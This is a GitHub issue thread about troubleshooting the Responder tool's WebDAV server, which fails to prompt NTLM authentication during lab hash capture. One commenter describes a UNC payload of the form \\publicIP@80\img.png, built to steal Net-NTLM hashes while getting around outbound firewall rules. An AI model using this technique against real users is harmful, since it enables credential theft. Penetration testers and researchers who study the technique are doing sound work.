WebDav NTLM auth
remi-cc opened this issue · 1 comments
Hi all,
I tried to capture an NTLM hash with the WebDAV HTTP server but I didn't manage...
Well, the victim's host is a Win 10 (fully updated) machine and the responder's host is a Kali VM.
- Victim IP address: 192.168.1.55
- Responder IP address: 192.168.1.50
I modified the Responder conf file to disable the SMB server, then executed: # responder -I eth0
When the victim asks for the test.pdf file ("OPTIONS /test.pdf HTTP/1.1"), Responder answers ("HTTP/1.1 200 OK", but without the DAV HTTP header) but no NTLM auth follows (NTLM is not disabled in my Windows victim conf). Then the victim sent a PROPFIND request, which got no answer (see the PCAP converted to a TXT file, attached: WebDAV-wihout-NTLM-authen.txt).
It seems that the WebDAV server isn't on... Did I miss something?
PS: It works with the SMB protocol.
@lgandx, if you have 5 minutes to take a look, I would be grateful.
Regards,
Rémi
Hello, same issue I think. I'm trying to steal a Net-NTLM hash with a payload like \\publicIP@80\img.png to bypass outgoing firewall rules on 445.
Responder receives the HTTP PROPFIND WebDAV request but doesn't answer it.
Kali and lgandx's git repo seem to be more up to date than this official one (see the IsWebDAV implementation in server/HTTP.py), but it still doesn't work.
Has nobody encountered this kind of problem?
EDIT: https://blog.didierstevens.com/2019/05/20/webdav-ntlm-responder/
Regards,
Hypnoze.